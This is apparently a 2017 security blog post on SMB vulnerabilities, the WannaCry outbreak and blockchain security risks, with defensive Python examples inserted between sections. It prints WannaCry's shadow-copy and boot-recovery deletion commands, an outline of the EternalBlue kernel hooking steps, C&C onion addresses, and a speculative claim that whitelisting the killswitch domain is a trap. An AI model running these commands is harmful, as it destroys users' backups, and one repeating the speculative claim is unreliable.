The details above only give readers an idea of the current situation in the cyber world. There are more advanced hacking techniques involved. That motivation drove me to do this quick research. My goal is to let IT users know more in this regard.

Coming soon!
How does the advanced technology fight with Dark Power

Advanced technology against Dark Power

How to rescue yourself this month: the SMB flaw applies to all Windows platforms

Quote:

By connecting to a malicious SMB server, a vulnerable Windows client system may crash (BSOD) in mrxsmb20.sys

Blocking outbound SMB connections – TCP ports 139 and 445 along with UDP ports 137 and 138 – from the local network to the wide area network ... said US-CERT

Reminder: Mrxsmb20.sys driver handles SMB 2.0 and SMB 3.0 traffic.

Windows OS design objective: In Windows 8, the SMB 3.0 protocol is supported. The Mrxsmb10.sys driver handles legacy SMB traffic, and the Mrxsmb20.sys driver handles SMB 2.0 and SMB 3.0 traffic.

Phenomenon: We have confirmed that without applying the May patch, Windows 10 and Windows 8.1 client systems, as well as the server equivalents of these platforms, Windows Server 2016 and Windows Server 2012 R2, all encounter the SMB vulnerability. In that sense, they are vulnerable.

Current Situation 1: If you are a Windows OS home user (any Windows platform), be aware and confirm that the hot-fix below is applied to your home workstation.

https://technet.microsoft.com/en-us/library/security/ms17-012.aspx

Current Situation 2:If you are IT guy maintained whole bunch of MS windows server. You are the technical expert and believed that the hotfix you apply already. But I would like to bring your attention of on server SMB registry.

What’s the reason to point out the SMB registry. It is a quick way to isolate the problem once you suspect that you file server may encounter malicious attack. As a matter of fact, registry check is one of the fast path know what is happen in malware movement.

Regarding to the subject matter, our objective is going to discuss how to rescue yourself this month due to SMB flaw, right? I written an techincal article yesterday mainly highlight the SMB flaw. For more details, please find below url for reference.

Does SMB mess up the world? But he is sick always! …Wanacrypt0r, SMB worm,…etc

Any information update will be posted. Thank you for your kind attention.

Does SMB mess up the world? But he is sick always! …Wanacrypt0r, SMB worm,…etc

Preface:

The ransomware outbreak (#wanacrypt0r #wannacry #ransomware #wcry) has run since last Friday, 12th May 2017, until this week. I believe there is no room to discuss it here, since you can easily get information updates on the internet. However, SMB is our discussion topic today. As we know, SMB version 1 is the culprit in WannaCrypt. The side effect looks to have affected only outdated Windows OS (2003, XP, Me and Vista) or recently end-of-support products (Windows 2008 rather than 2008 R2)! In the meantime, do you, like me, have concerns about SMB version 2 and version 3?

SMB critical flaw historical background:

Vulnerability in Microsoft Windows SMB2: the _Smb2ValidateProviderCallback() flaw, found in 2009.

An attacker could exploit this flaw to disable the remote host or to execute arbitrary code on it.

Solution: as a workaround, you can disable SMB2 by editing the registry. Under the hive HKLM\System\CurrentControlSet\Services\LanmanServer\Parameters, create the value 'Smb2' (type REG_DWORD) and set it to 0.
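As an added example (not code from this post), here is a small Python script that audits an exported copy of that LanmanServer\Parameters key, which also serves the "check the server SMB registry" advice in the article above. The value names SMB1 and Smb2 and their meaning (REG_DWORD, 0 = disabled, absent = Windows default of enabled) follow Microsoft's documentation; the .reg text is constructed. The caveat it surfaces is that the old Smb2=0 workaround also switches off SMB3 and forces clients down to SMBv1, the protocol WannaCry abuses.

```python
"""Audit a LanmanServer\\Parameters registry export for SMB protocol settings.

Assumptions (not from the original post): the input is the text produced by
`reg export HKLM\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters <file>`
and the value names SMB1 / Smb2 follow Microsoft's documented meaning
(REG_DWORD, 1 = enabled, 0 = disabled; absent = enabled by default).
"""
import re

# Constructed sample export: the host still has SMB1 on and the old 2009
# "Smb2=0" workaround lingering, so clients are forced down to SMBv1.
SAMPLE_REG_EXPORT = """Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\LanmanServer\\Parameters]
"AutoShareServer"=dword:00000001
"SMB1"=dword:00000001
"Smb2"=dword:00000000
"""

TARGET_KEY = r"HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters"
_VALUE_RE = re.compile(r'^"(?P<name>[^"]+)"=dword:(?P<hex>[0-9a-fA-F]{8})$')


def parse_reg_export(text):
    """Return {key_path: {value_name: int}} for the dword values in a .reg export."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        m = _VALUE_RE.match(line)
        if m and current is not None:
            keys[current][m.group("name")] = int(m.group("hex"), 16)
    return keys


def audit_lanmanserver(text):
    """Report SMB1/SMB2 state; a missing value means the Windows default (enabled)."""
    params = parse_reg_export(text).get(TARGET_KEY, {})
    # registry value names are not case sensitive, so compare lower-cased
    lower = {k.lower(): v for k, v in params.items()}
    smb1 = lower.get("smb1", 1)
    smb2 = lower.get("smb2", 1)
    findings = []
    if smb1 != 0:
        findings.append("SMB1 is enabled on the server; disable it unless legacy clients require it")
    if smb2 == 0:
        findings.append("Smb2=0 disables SMBv2 and SMBv3, forcing clients to SMBv1")
    return {"SMB1": smb1, "Smb2": smb2, "findings": findings}


if __name__ == "__main__":
    report = audit_lanmanserver(SAMPLE_REG_EXPORT)
    for finding in report["findings"]:
        print("FINDING:", finding)
```

Note that reg.exe writes exports as UTF-16 with a byte-order mark, so open a real export with encoding="utf-16" before passing the text in.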

On August 11, 2015, Microsoft released an SMB server fix (MS15-083 – Microsoft Windows SMB Memory Corruption Vulnerability). An authenticated remote code execution vulnerability exists in Windows that is caused when Server Message Block (SMB) improperly handles certain logging activities, resulting in memory corruption. A successful exploit could corrupt memory in such a way as to allow the attacker to execute arbitrary code, and could result in a complete system compromise.

SMB architecture

The structure of the header is as follows:

SMB_Header
   {
   UCHAR  Protocol[4];
   UCHAR  Command;
   SMB_ERROR Status;
   UCHAR  Flags;
   USHORT Flags2;
   USHORT PIDHigh;
   UCHAR  SecurityFeatures[8];
   USHORT Reserved;
   USHORT TID;
   USHORT PIDLow;
   USHORT UID;
   USHORT MID;
   }
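The header above is easy to decode with Python's struct module. The following is an added example, not code from this post: it parses the 32-byte SMB1 header laid out above and tells SMB1 apart from SMB2/3 frames by their protocol signature (0xFF 'S' 'M' 'B' for SMB1, 0xFE 'S' 'M' 'B' for SMB2 and later, from the SMB2 specification), which is what a sensor needs in order to alert on legacy SMB1 traffic. The packets are constructed, not captured.

```python
"""Parse the SMB1 header shown above and tell SMB1 from SMB2/3 on the wire.

Added example, not from the original post. Assumes the 32-byte SMB1 header
layout listed above (little-endian) and the SMB2 signature 0xFE 'S' 'M' 'B'
from the SMB2 specification; the packets below are constructed, not captured.
"""
import struct
from collections import namedtuple

SMB1_MAGIC = b"\xffSMB"
SMB2_MAGIC = b"\xfeSMB"

# <  little-endian
# 4s Protocol   B Command   I Status   B Flags   H Flags2   H PIDHigh
# 8s SecurityFeatures   H Reserved   H TID   H PIDLow   H UID   H MID  -> 32 bytes
SMB1_HEADER = struct.Struct("<4sBIBHH8sHHHHH")
SmbHeader = namedtuple("SmbHeader", "protocol command status flags flags2 pid_high "
                                    "security_features reserved tid pid_low uid mid")

SMB1_NEGOTIATE = 0x72  # SMB_COM_NEGOTIATE


def parse_smb1_header(data):
    """Decode the first 32 bytes of an SMB1 message; raise ValueError otherwise."""
    if len(data) < SMB1_HEADER.size:
        raise ValueError("short SMB header: %d bytes" % len(data))
    hdr = SmbHeader._make(SMB1_HEADER.unpack_from(data))
    if hdr.protocol != SMB1_MAGIC:
        raise ValueError("not an SMB1 header: %r" % hdr.protocol)
    return hdr


def classify_smb(data):
    """Return 'SMB1', 'SMB2' (covers SMB 2.x/3.x, same framing) or 'unknown'."""
    if data.startswith(SMB1_MAGIC):
        return "SMB1"
    if data.startswith(SMB2_MAGIC):
        return "SMB2"
    return "unknown"


def build_smb1_header(command, tid=0, pid=0, uid=0, mid=0, flags2=0):
    """Helper used only to construct sample packets for this example."""
    return SMB1_HEADER.pack(SMB1_MAGIC, command, 0, 0x18, flags2,
                            (pid >> 16) & 0xFFFF, b"\0" * 8, 0, tid,
                            pid & 0xFFFF, uid, mid)


# Constructed samples: an SMB1 NEGOTIATE request and an SMB2 header prefix.
SAMPLE_SMB1 = build_smb1_header(SMB1_NEGOTIATE, pid=0x1234, mid=1, flags2=0xC853)
SAMPLE_SMB2 = SMB2_MAGIC + b"\x40\x00" + b"\x00" * 62  # StructureSize 64, rest zeroed


def legacy_smb1_alert(packets):
    """Defender view: indices of packets carrying SMB1, the dialect EternalBlue targets."""
    return [i for i, p in enumerate(packets) if classify_smb(p) == "SMB1"]


if __name__ == "__main__":
    h = parse_smb1_header(SAMPLE_SMB1)
    print("command=0x%02x pid=0x%04x%04x mid=%d" % (h.command, h.pid_high, h.pid_low, h.mid))
    print("SMB1 packets:", legacy_smb1_alert([SAMPLE_SMB1, SAMPLE_SMB2]))
```

On a real capture the bytes handed to these functions start right after the 4-byte NetBIOS session header that precedes every SMB message on TCP 445.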

Why does SMB always encounter vulnerabilities? Why does the old version of SMB need to stay in Windows?

The NSA surveillance toolkit named EternalBlue exploits a vulnerability in SMB. From my personal point of view, no surprise, since no operating system is perfect. But the earliest SMB flaw dates back to 2009: a flaw was found in the Microsoft SRV.SYS driver, a remote code execution vulnerability in Microsoft SMB servers (WriteAndX Invalid DataOffset).

Remark: Srv.sys is a Windows driver. A driver is a small software program that allows your computer to communicate with hardware or connected devices. This means a driver has direct access to the internals of the operating system, hardware, etc. (see the picture below for reference). Microsoft suggests that Srv.sys be set to start on demand, since it only communicates with old-fashioned clients such as Windows XP.

Command: sc config srv start= demand

According to security vendor Rapid7's findings in 2009, the Microsoft SRV2.SYS SMB Negotiate ProcessID Function Table module exploits an out-of-bounds function table dereference in SMB.

It looks irritating; we are not going to post all the flaws. But I am interested in whether something is wrong in the fundamental design that causes non-stop vulnerabilities. As far as I know, the whole SMB family is prone to vulnerabilities, even SMB3! An official announcement by Microsoft highlights that transferring files by using SMB2 or SMB3 causes a memory leak on a Windows computer (see the URL below for reference), and Microsoft issued a hotfix in 2017.

https://support.microsoft.com/en-us/help/2928360/transferring-files-by-using-smb2-or-smb3-causes-memory-leak-on-a-windows-computer

Our observation:

Take the latest reference as an example and see the weakness of SMB. Yes, it is not only SMBv1: SMB2 and SMB3 have their own design weaknesses in memory validation (see the description above). OK, let's go. We start the journey.

The Equation Group (NSA) woke up all the IT guys: an attacker can easily initiate a Ring 0 attack relying on SMB. They took the following actions:

  1. Determine x86 or x64.
  2. Confirm and locate the IDT (Interrupt Descriptor Table) from the KPCR (Kernel Processor Control Region).
  3. View physical memory addresses in OllyDbg and traverse backward from the memory address, i.e. from the end back to the first interrupt handler, to find the ntoskrnl.exe base address.
  • If the file does not begin with "MZ" or "ZM", it is not a DOS or Windows executable image. Otherwise you may have one of the following executable formats: plain DOS, NE (Windows 16-bit), LE (16-bit VXD), PE32, or PE32+ (PE64).
  • Determine whether you have a plain DOS executable by looking at the e_lfanew value. A plain DOS executable will have an out-of-range e_lfanew pointing outside the limits of the file, a zero, or, if the offset happens to be in range, a signature at that offset that matches none of the signatures below.
  • Try to match the signature at the "in-range" offset pointed to by e_lfanew with the following WORD or DWORD values:
    "PE" followed by two zero bytes if the image is a PE32 or PE32+ (PE64); which of the two is further determined by the "magic" in the NT Optional Header
    "NE" indicates the image is a 16-bit Windows executable
    "LE" indicates the image is a 16-bit Virtual Device Driver (VXD)

5. Reads ntoskrnl.exe's export directory and uses hashes to find the ExAllocatePool/ExFreePool/ZwQuerySystemInformation functions.

Remark: if you would like to call ZwQuerySystemInformation, a parameter must be attached to the call: you must supply an input buffer of the size of SYSTEM_PROCESS_INFORMATION, then check the return value and the returned required size. If the return is not success, you must make a second call with an input buffer of the required size (i.e. the size returned from the first call).

6. Calls ZwQuerySystemInformation with the SystemQueryModuleInformation argument, which loads a list of all drivers. It uses this to locate Srv.sys, an SMB driver.

7. Switches the SrvTransactionNotImplemented() function pointer located at SrvTransaction2DispatchTable[14] to its own hook function.

Remark: Npp buffer + 0x100 directly written before the leak out of the function table
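The executable-format checks in step 3 are a useful forensic routine on their own (triaging an unknown binary pulled from a host), so here is an added Python example, not from this post and not the Equation Group's code, that implements only those checks: MZ/ZM, the e_lfanew range test, the PE/NE/LE signature, and the Optional Header magic that separates PE32 from PE32+. The offsets (e_lfanew at 0x3C, a 20-byte IMAGE_FILE_HEADER, magic 0x10B/0x20B) are from the PE format; the images it runs on are constructed byte strings. Nothing here touches the kernel.

```python
"""Identify a DOS/NE/LE/PE32/PE32+ image from its headers (forensic triage).

Added example, not code from the original post. Implements only the
format-identification bullets above (MZ/ZM, e_lfanew, PE/NE/LE signature,
Optional Header magic). Sample images are constructed byte strings, not real files.
"""
import struct

PE32_MAGIC, PE32PLUS_MAGIC = 0x10B, 0x20B


def identify_image(data):
    """Return one of: 'not-executable', 'dos', 'ne', 'le', 'pe32', 'pe32+', 'unknown-pe'."""
    if len(data) < 0x40 or data[:2] not in (b"MZ", b"ZM"):
        return "not-executable"
    # e_lfanew: DWORD at offset 0x3C of IMAGE_DOS_HEADER
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # plain DOS: e_lfanew is zero or points outside the file
    if e_lfanew == 0 or e_lfanew + 4 > len(data):
        return "dos"
    sig = data[e_lfanew:e_lfanew + 4]
    if sig[:2] == b"NE":
        return "ne"
    if sig[:2] == b"LE":
        return "le"
    if sig != b"PE\0\0":
        return "dos"  # in-range offset but no known signature
    # IMAGE_NT_HEADERS: Signature(4) + IMAGE_FILE_HEADER(20) + OptionalHeader.Magic(2)
    magic_off = e_lfanew + 4 + 20
    if magic_off + 2 > len(data):
        return "unknown-pe"
    magic = struct.unpack_from("<H", data, magic_off)[0]
    return {PE32_MAGIC: "pe32", PE32PLUS_MAGIC: "pe32+"}.get(magic, "unknown-pe")


def _dos_stub(e_lfanew):
    """Build a minimal 64-byte IMAGE_DOS_HEADER with the given e_lfanew (sample data)."""
    hdr = bytearray(0x40)
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, e_lfanew)
    return bytes(hdr)


def _pe_sample(magic):
    """Constructed PE image: DOS header, PE signature, zeroed file header, magic."""
    return _dos_stub(0x40) + b"PE\0\0" + b"\0" * 20 + struct.pack("<H", magic)


SAMPLES = {
    "pe32": _pe_sample(PE32_MAGIC),
    "pe32+": _pe_sample(PE32PLUS_MAGIC),
    "ne": _dos_stub(0x40) + b"NE" + b"\0" * 62,
    "le": _dos_stub(0x40) + b"LE" + b"\0" * 62,
    "dos": _dos_stub(0) + b"\xb4\x4c\xcd\x21",   # MZ header, no NT header
    "not-executable": b"#!/bin/sh\n",
}

if __name__ == "__main__":
    for name, blob in SAMPLES.items():
        print("%-15s -> %s" % (name, identify_image(blob)))
```

To triage a real file, read it with open(path, "rb").read() and pass the bytes to identify_image; a result of "unknown-pe" on a file that claims to be PE is itself worth a closer look.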

The scenario above happens with SMB (SMBv1) only. But we now know SMB2 and SMB3 have also been found vulnerable on the memory side. My research is under way, my friend; I will keep you posted if there is anything new.

Security alert! Trap of WannaCry – status update on 29th May 2017

Is it anti-tradition? IT folks, do you whitelist ifferfsodp9ifjaposdfjhgosurijfaewrwergwea[.]com? Experts said that, by a strange design, WannaCry will stop spreading the ransomware to known subnets once it can get in touch with its C&C server. But do you think this is a trap? I speculated that the ransomware intends to create this trap to fool those who think this is a solution, and can then easily go into their internal network in a second phase. So the better idea is not to put this domain into your whitelist. Cheers!

Information update on 18th May 2017

Recent Wana Decrypt0r 2.0 C&C servers:

  • 57g7spgrzlojinas.onion
  • xxlvbrloxvriy2c5.onion
  • 76jdd2ir2embyv47.onion
  • cwwnhwhlz52maqm7.onion

Wana Decrypt0r 2.0 modifies the Windows registry and targets the following sub-keys:

HKCU\Software\Microsoft\Windows\CurrentVersion\Run\
HKCU\Software\WanaCrypt0r\
HKCU\Software\WanaCrypt0r\wd
HKCU\Control Panel\Desktop\Wallpaper

Encryption algorithms:

  • AES-128 (Advanced Encryption Standard): the file cannot be decrypted until you receive the FEK (File Encryption Key). This key may be the only way to decrypt the files.

Structure of an encrypted file

Rivest-Shamir-Adleman (RSA): WannaCry's design objective is to generate unique public and private keys for each file. This makes decrypting each file a separate, unique and very difficult process.

Observation:

Attention: if no data backup is on hand, it is hard to say that paying the ransom is the solution. WanaCrypt0r .WNCRY carries an extremely destructive concept: it deletes the shadow volume copies and eradicates all chances of reverting your files from backups on the infected computer (see the destructive command syntax below). The security concern is that it is hard to guarantee the machine is virus-free after the hard disk is encrypted on the victim's machine. As a matter of fact, WannaCry arrives via an exploit kit, a DLL file attack, malicious JavaScript or a drive-by download of the malware. There is no evidence to prove that WanaCrypt0r will remove its footprint after the victim pays the ransom, and therefore the victim machine stays vulnerable until a low-level format of the hard disk and reinstallation of all applications. But it is hard to tell at this moment. Therefore the data must be handled carefully after you pay the ransom.

The destructive command syntax is shown below:

  1. vssadmin delete shadows /all /quiet
  2. wmic shadowcopy delete

Remark: at user level, the commands below can be run as follows: go to Start Menu > All Programs > Accessories, then right-click Command Prompt and select Run As Administrator, because administrative privileges are required to use BCDEdit to modify the BCD.

  3. bcdedit /set bootstatuspolicy ignoreallfailures
  4. bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
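The four commands above are a strong detection signal, because legitimate software almost never deletes every shadow copy and then disables boot recovery within the same minute. The Python below is an added example, not code from this post: it runs simple rules over constructed process-creation log lines (a Sysmon-like "time | parent image | command line" layout, which is my assumption; adapt the parser to your own telemetry) and flags the burst.

```python
"""Flag shadow-copy / boot-recovery tampering in process-creation logs.

Added example, not from the original post. The log lines are constructed in
a Sysmon-like "Event 1" style (timestamp | parent image | command line);
that layout is an assumption, adjust parse_log() to your own telemetry.
"""
import re

# Each rule: (name, regex over the command line), case-insensitive and
# tolerant of an .exe suffix or extra switches between the words.
RULES = [
    ("shadow_copy_delete_vssadmin", re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows\b", re.I)),
    ("shadow_copy_delete_wmic",     re.compile(r"\bwmic(\.exe)?\b.*\bshadowcopy\s+delete\b", re.I)),
    ("boot_status_policy_ignore",   re.compile(r"\bbcdedit(\.exe)?\b.*\bbootstatuspolicy\s+ignoreallfailures\b", re.I)),
    ("recovery_disabled",           re.compile(r"\bbcdedit(\.exe)?\b.*\brecoveryenabled\s+no\b", re.I)),
    ("backup_catalog_delete",       re.compile(r"\bwbadmin(\.exe)?\b.*\bdelete\s+catalog\b", re.I)),
]

# Constructed sample telemetry: "<time> | <parent image> | <command line>"
SAMPLE_LOG = """\
2017-05-12T11:02:03Z | C:\\Windows\\System32\\cmd.exe | vssadmin delete shadows /all /quiet
2017-05-12T11:02:03Z | C:\\Windows\\System32\\cmd.exe | wmic shadowcopy delete
2017-05-12T11:02:04Z | C:\\Windows\\System32\\cmd.exe | bcdedit /set {default} bootstatuspolicy ignoreallfailures
2017-05-12T11:02:04Z | C:\\Windows\\System32\\cmd.exe | bcdedit /set {default} recoveryenabled no
2017-05-12T11:02:04Z | C:\\Windows\\System32\\cmd.exe | wbadmin delete catalog -quiet
2017-05-12T11:05:00Z | C:\\Windows\\explorer.exe | "C:\\Program Files\\Notepad++\\notepad++.exe" notes.txt
2017-05-12T11:06:00Z | C:\\Windows\\System32\\cmd.exe | vssadmin list shadows
"""


def parse_log(text):
    """Yield (timestamp, parent, cmdline) tuples from the constructed format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, cmd = (part.strip() for part in line.split("|", 2))
        yield ts, parent, cmd


def detect(text):
    """Return one finding per (line, rule) hit: a command that tampers with recovery."""
    hits = []
    for ts, parent, cmd in parse_log(text):
        for name, pattern in RULES:
            if pattern.search(cmd):
                hits.append({"time": ts, "rule": name, "parent": parent, "cmdline": cmd})
    return hits


def looks_like_ransomware(hits, min_rules=3):
    """Several distinct rules firing in one burst is the ransomware pattern."""
    return len({h["rule"] for h in hits}) >= min_rules


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for h in found:
        print("%s  %-28s %s" % (h["time"], h["rule"], h["cmdline"]))
    print("ransomware-style recovery tampering:", looks_like_ransomware(found))
```

A single hit (an administrator running vssadmin delete shadows during maintenance) is worth a ticket; three or more distinct rules from the same parent process within seconds is worth isolating the host.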

Hints and Resolution found on 19th May 2017

It has been found that on Windows 7, XP, Windows 2003 (x86 confirmed), Vista, 2008 and 2008 R2, but not Windows 10, the OS itself keeps in memory a copy of the two prime numbers it provided to WannaCry. Those primes can be recovered, and it is possible to rely on this to compute the encryption key and then decrypt all encrypted data. A tool that makes use of the above might have a way to decrypt your data. For more details, please refer to the URL below.

https://github.com/aguinet/wannakey
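The idea behind that tool is ordinary RSA arithmetic: if the two primes p and q are recovered from memory, the private exponent d can be recomputed from them, and d decrypts whatever the public key encrypted. The Python below is an added example, not wannakey's code; it uses two small constructed primes so it runs offline, and the per-file key it recovers is a constructed stand-in for the AES key that WannaCry wraps with RSA.

```python
"""Rebuild an RSA private key from its two primes (the principle behind wannakey).

Added example, not wannakey's code. Uses small constructed primes so it runs
offline; the same arithmetic applies to the 1024-bit primes recovered from
memory. Only p and q are needed: n, phi and d follow from them, and d is
what decrypts the per-file AES keys.
"""
from math import gcd


def egcd(a, b):
    """Extended Euclid: returns (g, x, y) with a*x + b*y == g == gcd(a, b)."""
    if b == 0:
        return a, 1, 0
    g, x, y = egcd(b, a % b)
    return g, y, x - (a // b) * y


def modinv(a, m):
    """Modular inverse of a mod m, or ValueError if it does not exist."""
    g, x, _ = egcd(a, m)
    if g != 1:
        raise ValueError("no modular inverse")
    return x % m


def private_key_from_primes(p, q, e=65537):
    """Given the recovered primes, rebuild (n, d); this is all the recovery needs."""
    if p == q or gcd(e, (p - 1) * (q - 1)) != 1:
        raise ValueError("primes unusable with this exponent")
    n = p * q
    phi = (p - 1) * (q - 1)
    return n, modinv(e, phi)


def rsa_encrypt(m, n, e=65537):
    return pow(m, e, n)


def rsa_decrypt(c, n, d):
    return pow(c, d, n)


# Constructed toy primes (the 10000th and 100000th primes); real keys use
# 1024-bit primes, but the arithmetic is identical.
P, Q = 104729, 1299709
SAMPLE_FILE_KEY = 0xDEADBEEF  # stands in for a per-file AES key to recover


def demo():
    """Encrypt a file key with the public key, then recover it from p and q alone."""
    n, _ = private_key_from_primes(P, Q)
    c = rsa_encrypt(SAMPLE_FILE_KEY, n)       # what the ransomware leaves on disk
    # recovery path: primes scraped from memory -> recompute d -> unwrap the key
    _, d = private_key_from_primes(P, Q)
    return rsa_decrypt(c, n, d)


if __name__ == "__main__":
    print(hex(demo()))
```

This is why the tool only works while the process memory has not been reused: once the primes are gone, factoring the 2048-bit modulus is the only way back to d, and that is infeasible.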

If the above hints cannot help and you would like to keep the encrypted data, you can do the following.

Back up all your files (00000000.eky and the remaining files). In future there may be a new resolution that provides the key to decrypt your data.

Part 3 : Blockchain technology – Trend benefits finance and crime

Preface:

Taking public transportation today (11th May 2017), the headline news displayed on the advertisement screen prompted me to start the discussion on blockchain technology again. It looks like a realistic situation intended to boost blockchain technology growth. Let's take a quick look!

As of 6 February 2016, there are 15.2 million bitcoins circulation of a capped total of 21 million.

Bitcoin's current status as of today, 11th May 2017:
  • Total volume: 1800 billion dollars
  • 4-day exchange volume equal to 30 billion dollars

Blockchain space: radical changes in 2017

In 2017 Microsoft announced its participation in the newly formed Enterprise Ethereum Alliance. Joining them are companies such as Intel, J.P. Morgan, BNY Mellon, BP, ING, Thomson Reuters and blockchain startups. In general, my idea of the keyword "Ethereum" has focused only on security incidents. It sounds like I am not suggesting anyone create Ethereum and let hackers get away with their money.

Quote: "In general, the Ethereum community is on board with the notion that we do not have to do things exactly the way that things are done in other crypto communities," – excerpt from Bloomberg Businessweek.

As a matter of fact, it is not the first day we have heard that a new technology has technical limitations, but it reaches a mature model eventually, right? So I am not keen to stubbornly say I do not suggest using it. Perhaps a positive discussion might provide more positive ideas in this regard.

High-level understanding of Ethereum

Ethereum is an open-source, public, blockchain-based distributed computing platform featuring smart contract (scripting) functionality.

Platform: x86, ARM

Initial release: 30 July 2015

Written in: C++, Go, Rust

Operating system: clients available for Linux, Windows, macOS, POSIX, Raspbian

Technical weaknesses from a security viewpoint

Programming language: C++

Security problems in C and C++ programs: it is hard to avoid the following issues:

  • buffer overflow attacks
  • integer problems in C/C++
  • file I/O risks
  • temporary files / a C++ TOCTOU vulnerability
  • Unicode bugs

Programming language: Go

How are blockchain applications developed in Go? What is Go? Go is a free and open-source language created at Google in 2007 by Robert Griesemer, Rob Pike, and Ken Thompson. Like other programming languages, it has its design limitations. A vulnerability found this year showed that the Go SSH library (x/crypto/ssh) by default did not verify host keys, facilitating man-in-the-middle attacks. The default behaviour was changed in commit e4e2799 to require explicitly registering a host key verification mechanism.

Programming language: Rust

Rust is a general-purpose programming language sponsored by Mozilla Research. It is designed to be a "safe, concurrent, practical language", supporting functional and imperative-procedural paradigms. Rust is syntactically similar to C++ but is designed for better memory safety while maintaining performance. Rust only panics on integer overflow in debug mode. So it looks like this programming language is suitable for developers building blockchain system applications.

Remark: developer analyst firm RedMonk charted Rust's move in the GitHub rankings from 46 to 18.

Modern cyber technology crisis

Ransomware attack is the first priority of concern:

The ransomware (WannaCry) attack hit 99 countries, with UK hospitals among the targets, yesterday. As we know, the specific attacks leverage a Windows exploit harvested from the NSA called EternalBlue (the vulnerabilities could allow remote code execution if an attacker sends specially crafted messages to a Microsoft Server Message Block 1.0 (SMBv1) server). As a result it triggers one-to-many attacks within the internal network. Since it relies on SMB, it spreads extremely fast. We are not going to discuss this incident today.

The reflections on this incident let us know that a design weakness can kill the system within one minute and broadcast the attack to its neighbours. Be reminded that even though blockchain or Ethereum technology networks are built by a group, it is a star topology network. That is a benefit for system and network resilience; however, it increases the inherent risk.

Peer-to-peer communications between nodes running Ethereum clients use the underlying ÐΞVp2p Wire Protocol. It is very secure. However, if a trusted client is compromised, from a technical point of view a hacker will find it easier to infiltrate. Besides, the objective of ransomware is ransom (money). If the victim's workstation (Ethereum client) or mobile phone (Ethereum client) is compromised by ransomware (the whole hard drive encrypted), there is a high possibility that they will pay the ransom, otherwise they lose more money.

Observation

As said, Ethereum deploys a high-standard secure protocol (the ÐΞVp2p Wire Protocol). However, you can drill down into different areas to see whether you can find a design limitation. For instance, a well-known vulnerability: Java Debug Wire Protocol remote code execution. The problem was that JDWP (Java Debug Wire Protocol), one layer within the Java Platform Debugger Architecture (JPDA), does not use any authentication and could be abused by an attacker to execute arbitrary code on the affected server. Any impact here?

But my concern is the fast synchronization process. In the meantime, I am still analysing the possibility of fooling the remote peer at the GetNodeData step. For more detail, please refer to the specification below.

Fast synchronization (PV63) specification:

GetNodeData [+0x0d, hash_0: B_32, hash_1: B_32, …] Require peer to return a NodeData message. Hint that useful values in it are those which correspond to given hashes.

NodeData [+0x0e, value_0: B, value_1: B, …] Provide a set of values which correspond to previously asked node data hashes from GetNodeData. Does not need to contain all; best effort is fine. If it contains none, then it has no information for the previous GetNodeData hashes.

GetReceipts [+0x0f, hash_0: B_32, hash_1: B_32, …] Require peer to return a Receipts message. Hint that useful values in it are those which correspond to blocks of the given hashes.

Receipts [+0x10, [receipt_0, receipt_1], …] Provide a set of receipts which correspond to those previously asked for in GetReceipts.
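A concrete way to look at the GetNodeData concern raised above: the requester hashes every value in the NodeData reply and keeps only those whose hash it actually asked for, so a peer can withhold data (best effort is allowed) but cannot substitute it. The Python below is an added example, not client code from the Ethereum project; the messages are plain lists without RLP framing, and hashlib.sha3_256 stands in for Ethereum's keccak-256 (assumption: the check is identical, only the hash function differs).

```python
"""Verify a NodeData reply against the GetNodeData request it answers.

Added example, not Ethereum client code. The PV63 messages above are shown
as Python lists; RLP framing is omitted. Ethereum uses keccak-256, which is
not in hashlib, so hashlib.sha3_256 stands in here (assumption: the
verification logic is identical, only the hash function differs).
"""
import hashlib

GET_NODE_DATA, NODE_DATA = 0x0D, 0x0E


def node_hash(value):
    """Content hash of a trie node (sha3_256 as a stand-in for keccak-256)."""
    return hashlib.sha3_256(value).digest()


def make_get_node_data(hashes):
    """Requester side: [+0x0d, hash_0, hash_1, ...]."""
    return [GET_NODE_DATA] + list(hashes)


def answer_get_node_data(request, store):
    """Honest responder: return whichever requested nodes it has (best effort)."""
    assert request[0] == GET_NODE_DATA
    return [NODE_DATA] + [store[h] for h in request[1:] if h in store]


def accept_node_data(request, reply):
    """Requester side: keep only values whose hash was actually asked for.

    Returns (accepted: dict hash->value, rejected: list of values).
    A peer can reply with garbage or with unrelated nodes, but cannot make
    a value hash to a requested hash, so the state trie stays content-addressed.
    """
    assert reply[0] == NODE_DATA
    wanted = set(request[1:])
    accepted, rejected = {}, []
    for value in reply[1:]:
        h = node_hash(value)
        if h in wanted and h not in accepted:
            accepted[h] = value
        else:
            rejected.append(value)
    return accepted, rejected


# Constructed trie nodes (opaque byte strings) held by an honest peer
HONEST_STORE = {node_hash(v): v for v in (b"node-A", b"node-B", b"node-C")}


def demo():
    """Exchange with an honest peer, then the same request answered by a lying peer."""
    want = [node_hash(b"node-A"), node_hash(b"node-C"), node_hash(b"node-missing")]
    req = make_get_node_data(want)
    honest = answer_get_node_data(req, HONEST_STORE)
    # a malicious peer appends a forged value and an unrequested (but real) node
    forged = honest + [b"forged-node", HONEST_STORE[node_hash(b"node-B")]]
    return accept_node_data(req, honest), accept_node_data(req, forged)


if __name__ == "__main__":
    (ok_acc, ok_rej), (bad_acc, bad_rej) = demo()
    print("honest peer: accepted", len(ok_acc), "rejected", ok_rej)
    print("lying peer:  accepted", len(bad_acc), "rejected", bad_rej)
```

What a dishonest peer can still do is stall the sync by returning nothing, which is a liveness problem the client handles by re-requesting from other peers, not an integrity problem.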

Summary:

Our discussion stops here today. I will provide more updates in this regard. Thank you.

Reference:

Part 2:Blockchain technology situation – Malware join to bitcoin mining

Part 1:Blockchain technology situation – A Tales of Two Cities

http://www.antihackingonline.com/network-protocol-topology-standard/part-1blockchain-technology-situation-a-tales-of-two-cities/

